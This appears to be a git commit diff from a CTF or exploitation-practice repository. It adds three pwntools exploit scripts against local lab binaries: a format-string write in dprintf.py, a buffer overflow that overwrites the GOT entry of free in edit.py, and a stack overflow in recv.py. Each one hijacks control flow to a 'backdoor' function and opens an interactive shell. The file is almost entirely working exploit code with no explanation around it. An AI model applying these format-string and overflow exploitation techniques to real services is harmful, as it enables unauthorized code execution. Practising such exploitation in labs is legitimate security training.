henry-1.6-commit

2024-11-02 12:14:46 +08:00
parent f9c69cbd47
commit f2fc600fea
32 changed files with 3439 additions and 294 deletions
--- a/input/dprintf
+++ b/input/dprintf
--- a/input/dprintf.i64
+++ b/input/dprintf.i64
--- a/input/dprintf.py
+++ b/input/dprintf.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+
+elf = ELF('./dprintf')
+sh = remote('127.0.0.1', 11008)
+
+sh.sendline(b'%39$p')
+stack_addr = int(sh.recvline(), 16)
+success('stack_addr: ' + hex(stack_addr))
+sh.sendline(fmtstr_payload(7, {stack_addr - 0x48: p64(elf.sym['backdoor'])}))
+
+sh.interactive()
--- a/input/edit
+++ b/input/edit
--- a/input/edit.i64
+++ b/input/edit.i64
--- a/input/edit.py
+++ b/input/edit.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+
+elf = ELF('./edit')
+
+sh = listen(12012)
+
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'ADD aaaa')
+tcpClient.close()
+
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'EDIT aaaa ' + b'a' * 256 + p64(elf.got['free']))
+tcpClient.close()
+
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'SHOW')
+tcpClient.recvline()
+index_str = tcpClient.recvline()[:-1]
+tcpClient.close()
+
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'EDIT ' + index_str + b' ' + p64(elf.sym['backdoor']))
+tcpClient.close()
+
+tcpClient = remote('127.0.0.1', 11012)
+tcpClient.sendline(b'DEL ' + p64(elf.sym['backdoor'])[:3])
+tcpClient.close()
+
+sh.interactive()
--- a/input/recv
+++ b/input/recv
--- a/input/recv.i64
+++ b/input/recv.i64
--- a/input/recv.py
+++ b/input/recv.py
@@ -0,0 +1,12 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+
+elf = ELF('./recv')
+sh = remote('127.0.0.1', 11007)
+
+sh.sendline(cyclic(264) + p64(elf.sym['backdoor']))
+
+sh.interactive()